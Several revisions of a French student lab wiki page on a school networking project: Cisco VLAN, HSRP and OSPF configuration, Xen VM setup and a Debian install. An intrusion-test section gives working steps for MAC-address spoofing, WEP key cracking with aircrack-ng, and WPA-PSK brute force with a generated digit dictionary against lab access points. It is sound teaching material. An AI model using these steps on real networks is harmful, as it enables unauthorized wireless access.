barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23097 TP sysres IMA2a5 2015/2016 G6 2015-11-20T10:30:46Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !<br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23089 TP sysres IMA2a5 2015/2016 G6 2015-11-20T09:48:13Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> On va commencer par créer un dictionnaire de clé : <br /> <br /> <pre><br /> #include <stdio.h><br /> <br /> int main (void)<br /> {<br /> int i=0;<br /> while(i<100000000)<br /> {<br /> printf("%08d\n",i);<br /> i++;<br /> }<br /> return 0;<br /> }<br /> </pre><br /> <br /> Il faut ensuite récupérer le handshake :<br /> <br /> <pre><br /> airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake<br /> </pre> <br /> <br /> J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.<br /> <br /> <pre><br /> df<br /> fdisk -l<br /> mkfs /dev/sda1<br /> mount /dev/sda1 /mnt<br /> cp handshake-01.cap /mnt<br /> umount /mnt<br /> </pre><br /> <br /> Une fois que le fichier est sur pifou, je lance le traitement :<br /> <br /> <pre><br /> aircrack-ng -w dico.txt handshake-01.cap<br /> </pre><br /> <br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23084 TP sysres IMA2a5 2015/2016 G6 2015-11-20T08:35:30Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> 